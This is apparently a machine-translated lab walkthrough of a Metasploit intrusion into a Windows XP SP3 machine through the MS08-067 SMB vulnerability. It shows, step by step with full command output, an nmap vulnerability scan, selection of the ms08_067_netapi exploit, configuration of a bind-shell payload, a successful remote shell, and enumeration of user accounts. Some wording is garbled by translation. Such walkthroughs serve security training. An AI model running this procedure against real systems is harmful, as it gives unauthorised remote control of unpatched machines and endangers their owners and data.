ms08-067 Vulnerability Remote overflow intrusion test

Attackers IP Address: 192.168.9.4, operating system Windows XP SP3 中文版

Attacker IP Address: 192.168.9.1

View Database Connection Status

MSF > Db_status
[*] PostgreSQL connected to MSF3

Using NMAP to scan target machines
MSF > Db_nmap-ss-sv-o--script=smb-check-vulns.nse-n 192.168.9.4
[*] Nmap:starting Nmap 5.61test4 (http://nmap.org) at 2012-09-25 11:01
[*] Nmap:nmap Scan for 192.168.9.4
[*] Nmap:host is up (0.00s latency).
[*] Nmap:not shown:997 closed ports
[*] Nmap:port State SERVICE VERSION
[*] Nmap:135/tcp Open MSRPC Microsoft Windows RPC
[*] NMAP:139/TCP Open NETBIOS-SSN
[*] NMAP:445/TCP Open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap:mac address:00:0c:29:43:d6:5f (VMware)
[*] Nmap:device type:general Purpose
[*] Nmap:Running:Microsoft Windows xp|2003
[*] Nmap:os Cpe:cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap:os details:microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap:network distance:1 Hop
[*] Nmap:service Info:OS:Windows; Cpe:cpe:/o:microsoft:windows
[*] Nmap:host Script Results:
[*] Nmap: | Smb-check-vulns:
[*]   Nmap: | Ms08-067:vulnerable
[*]   Nmap: | conficker:likely Clean
[*]   Nmap: | Regsvc dos:check DISABLED (add '--script-args=unsafe=1 ' to run)
[*]   Nmap: | SMBv2 DoS (cve-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1 ' to run)
[*]   Nmap: | Ms06-025:check DISABLED (remove ' safe=1 ' argument to run)
[*] Nmap: |_ ms07-029:check DISABLED (remove ' safe=1 ' argument to run)
[*] Nmap:os and Service detection performed. Please incorrect results athttp://nmap.org/submit/.
[*] Nmap:nmap done:1 IP Address (1 host up) scanned in 10.28 seconds

Find ms08_067 Vulnerabilities

MSF > Search ms08_067

Matching Modules
================

Name Disclosure Date Rank Description
----                                 ---------------          ----   -----------
Exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service relative Path Stack corrupti On

Using the ms08_067 vulnerability
MSF > Use EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI

Set remote address, forward connection
MSF exploit (MS08_067_NETAPI) > Set rhost 192.168.9.4
Rhost => 192.168.9.4

Set Shellcode
MSF exploit (MS08_067_NETAPI) > Set Payload windows/shell_bind_tcp
Payload => windows/shell_bind_tcp

Show options for configuration
MSF exploit (MS08_067_NETAPI) > Show options

Module Options (EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI):

Name Current Setting Required Description
----     ---------------  --------  -----------
Rhost 192.168.9.4 Yes the target address
Rport 445 Yes Set the SMB service port
Smbpipe BROWSER Yes the pipe name to use (BROWSER, srvsvc)

Payload Options (WINDOWS/SHELL_BIND_TCP):

Name Current Setting Required Description
----      ---------------  --------  -----------
Exitfunc thread Yes Exit Technique:seh, thread, process, none
Lport 4444 Yes the listen port
Rhost 192.168.9.4 no The target address

Exploit target:

Id Name
--  ----
0 Automatic Targeting

Expliot
MSF exploit (MS08_067_NETAPI) > Exploit
[*] Started bind handler
[*] Automatically detecting the target ...
[*] Fingerprint:windows Xp-service Pack 3-lang:english
[*] Selected target:windows XP SP3 中文版 (AlwaysOn NX)
[*] Attempting to trigger the vulnerability ...
[*] Command Shell Session 1 opened (192.168.9.1:1126-> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800

Successfully returned to Shell

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\windows\system32>net User
NET user

User accounts for \ \

-------------------------------------------------------------------------------
Administrator Guest Hacker
HelpAssistant Support_388945a0
The command completed with one or more errors.

--------------------------------------------------------------------------------------------------------------- ---------

If you want the vulnerability to support what operating system, you can enter the info command, you can see the details about the vulnerability.